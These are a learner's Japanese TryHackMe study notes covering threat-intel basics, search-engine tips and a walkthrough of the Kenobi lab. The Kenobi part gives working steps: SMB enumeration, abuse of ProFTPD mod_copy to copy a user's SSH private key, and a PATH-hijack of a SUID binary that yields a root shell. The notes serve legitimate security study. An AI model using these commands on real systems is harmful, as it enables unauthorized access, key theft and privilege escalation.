TryHackMe記録
ぽてと2025/05/21
Pyramid Of Pain
Hash
- MD5やSHA1は非推奨
- マルウェアのhashについて
- https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/
- ここに出てきた
a710ed9e008326b981ff0fadb1c75d89deca2b52451d4677a8fd808b4ac0649bをvirustotalで検索すると、maliciousと判定された - この感じでファイルをhashかして検索をかけるんだなー
IPアドレス
- FastFlux: 常に変化するドメイン名に関連付けられた複数のIPアドレスを持つ
- 実際にFastFluxを用いた攻撃のレポートからDNSやipが変更される様子を確認する
ドメイン名
- Punycodeを使って有名なドメイン名になりすます
- URL短縮サービスで隠す
- 短縮urlの後ろに+をつけることで、遷移前にプレビューを確認できる
アーティファクト調査
ネットワーク
- WireSharkでパケット監視をできるようです。無知
https://armoris.hatenablog.com/entry/2021/04/12/150812 - UserAgent文字列で検索して、何から来たリクエストか判別する
ツール
ウィルススキャンが大事だよーという話だと思う
- スピア・フィッシング:特定の対象にたいするフィッシング攻撃
- MalwareBazzar:マルウェアのDB
https://bazaar.abuse.ch/browse/ - ファジーハッシュ:入力が近似したものは近似したハッシュ値になる
多少ファイルの中身を変えても検知できるということだと思う
TTPs
攻撃者のステップ、戦術、技術、手順
ぽてと2025/05/17
Kenobi
nmap
ポートスキャン
nmap target_ip -vvv
SMB
WindowsとLinux間でファイル共有
-
smb-enum-shares
ファイル共有の一覧を列挙する -
smb-enum-users
ユーザー一覧の列挙
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_ip
ここで、anonymousというファイル共有が見つかったので、ダウンロードする
# リソースにアクセス
smbclient //target_ip/anonymous
smb: \> ls
# ダウンロード
smbget -R smb://target_ip/anonymous
seachsploit
Exploit-DBのデータベースから脆弱性を調査する。
searchsploit ProFTPD 1.3.5
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
ここで見つかったmod_copyの脆弱性を付きます。
認証を通さずに、閲覧権限があるファイルをダウンロードできるもの。ssh鍵を盗みます
nc target_ip 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.217.211]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
これで、ssh接続ができるようになりました
mkdir /mnt/kenobiNFS
mount target_ip:/var /mnt/kenobiNFS
cp /mnt/kenobiNFS/tmp/id_rsa .
ssh -i id_rsa kenobi@target_ip
SUID
SUIDビット:権限が実行権限がsになっている
一般ユーザーがroot権限でファイルを実行できる。
passwdなどは権限がないといけないので、そういったものに利用できる。
このSUIDビットが振られている不自然なものを探す
find / -perm -u=s -type f 2>/dev/null
...
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
...
正直解答欄から当てに行ったが、ユーザー操作関係ないものには普通割り当てないのかって今になって思った。/usr/bin/menuが答え
root権限でshellを叩く
/usr/bin/menuのオプション1がcurlを叩くっぽいので、curlに/bin/shを上書きすることで、root権限で/bin/shを実行することができる。すご
echo /bin/sh > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cat /root/root.txt
感想
知らないことばっかりで、新鮮でした。これからがんばります。searchsploitを入れた。
最後の部分はifconfigとかも乗っ取れたような気がするので、マシンが落ちる前に試せばよかったなと。
参考
まとめるにあたって以下を参考にしました
ぽてと2025/05/19
Search Skills
全体的に、検索のTipsについてです。知っているものもあれば、知らないものもあったという感じです。
検索エンジンのTips
-
-xxxでxxxに関する情報を除いて検索できる
ゲーム攻略とかが捗りそう -
filetype:xxxフォーマットで検索できる
学生時代に知りたかった。pdfとかで検索しやすそう
特化された検索エンジン
-
Shodan
インターネットにつながったものを検索できる -
virustotal
webウィルス診断 -
hibp
自分のメアドが漏れているか検索できる
これ検索によって漏れたりしないんかな?笑
SNS
snsを活用しろ、とのことで、現代的。流行ってるSNSは捨てメアドで味見しておけ、とのことでした。
秘密の質問などが、答えられてしまうリスク、などは確かになあ、と思いました